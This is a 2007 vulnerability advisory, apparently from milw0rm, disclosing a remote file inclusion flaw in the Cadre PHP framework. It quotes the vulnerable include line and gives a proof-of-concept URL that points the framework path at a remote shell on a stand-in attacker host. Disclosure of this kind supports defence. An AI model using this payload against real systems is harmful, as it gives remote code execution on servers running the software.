____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/ .OR.ID
ECHO_ADV_63$2007
------------------------------------------------------------------------------------
[ECHO_ADV_63$2007] Cadre remote file inclusion
------------------------------------------------------------------------------------
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : January, 31st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv63-y3dips-2007.txt
Critical Lvl : Critical
------------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Cadre
URL : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/
Download-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.tar.gz
Description : Cadre is a PHP framework for developing large business applications.
It currently supports PostgreSQL as the database back end (although
this is extensible). We (Cronosys, LLC) have invested two and a half
years in this framework and applications based on this framework.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~
---------------class.Quick_Config_Browser.php --------------------
...
include_once($GLOBALS[config][framework_path] . "class.Browser.php");
...
------------------------------------------------------------------
An attacker can exploit this vulnerability with a simple php injection script.
Poc/Exploit:
~~~~~~~~
http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?
---------------------------------------------------------------------------
Shoutz:
~~~
~ my lovely ana
~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff
~ str0ke, waraxe, negative
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~
y3dips|| echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/
# milw0rm.com [2007-01-31]